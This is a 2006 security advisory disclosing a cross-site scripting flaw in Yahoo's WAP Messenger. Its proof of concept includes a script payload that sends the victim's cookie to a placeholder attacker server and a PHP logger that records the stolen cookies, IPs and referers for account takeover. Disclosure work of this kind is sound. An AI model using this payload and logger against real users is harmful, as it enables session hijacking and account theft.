ECHO_ADV_47$2006 ------------------------------------------------------------------------------ [ECHO_ADV_47$2006] WAP Y! Messenger Cross-Site Scripting Vulnerability ------------------------------------------------------------------------------ Author : Dedi Dwianto Date Found : Sep, 14th 2006 Location : Indonesia, Jakarta web : http://advisories.echo.or.id/adv/adv47-theday-2006.txt Critical Lvl : Medium Critical Impact : Cross Site Scripting Where : From Remote --------------------------------------------------------------------------- Affected Yahoo Service description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Wireless Application Protocol or WAP is an open international standard for applications thatuse wireless communication. Its principal application is to enable access to the internet from a mobile phone or PDA. Yahoo! Have wap site which provide mobile services such as messenger,mail and news via mobile phone or PDA. Service : Y! Messenger URL : http://mm.yahoo.com/ --------------------------------------------------------------------------- Vulnerability: ~~~~~~~~~~~~~~ Y! Wap messenger allow user can execute the HTML code if message want to save. Proof Of Concept: ~~~~~~~~~~~~~~~ [1] Open and login with wap browser , url : http://mm.yahoo.com [2] Goto : http://mm.yahoo.com/xhtml?k=[id]&u=[your_nick]&s=[your session]&m=[your_nick]_dummymin&c=707&p=&d=[your_friend_id]*[your_nick]*[random number]*[XSS HERE] Attacker Stealting Cookie for get Account : [1] Send message to victim with connected via mobile/wap . message : ----begin---- Hello , please save my message :) <script>document.location='http://your-server/get_cookie.php?ambil=' + document.cookie</script> ----end ----- ----get_cookie.php---- <?php $cookie = $_GET['ambil']; $ip = getenv ('REMOTE_ADDR'); $date=date("j F, Y, g:i a"); $referer=getenv ('HTTP_REFERER'); $fp = fopen('cookies.txt', 'a'); fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br><br>'); fclose($fp); ?> ----end ----- change permission file cookies.txt to 777 Solution: ~~~~~~~ - Don't Save any message with html code :). --------------------------------------------------------------------------- Shoutz: ~~~ ~ y3dips,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous ~ az001,boom3x,mathdule,angelia ~ newbie_hacker@xxxxxxxxxxxxxxx ~ #aikmel - #e-c-h-o @irc.dal.net ------------------------------------------------------------------------ --- Contact: ~~~~ EcHo Research & Development Center the_day[at]echo[dot]or[dot]id -------------------------------- [ EOF ]----------------------------------
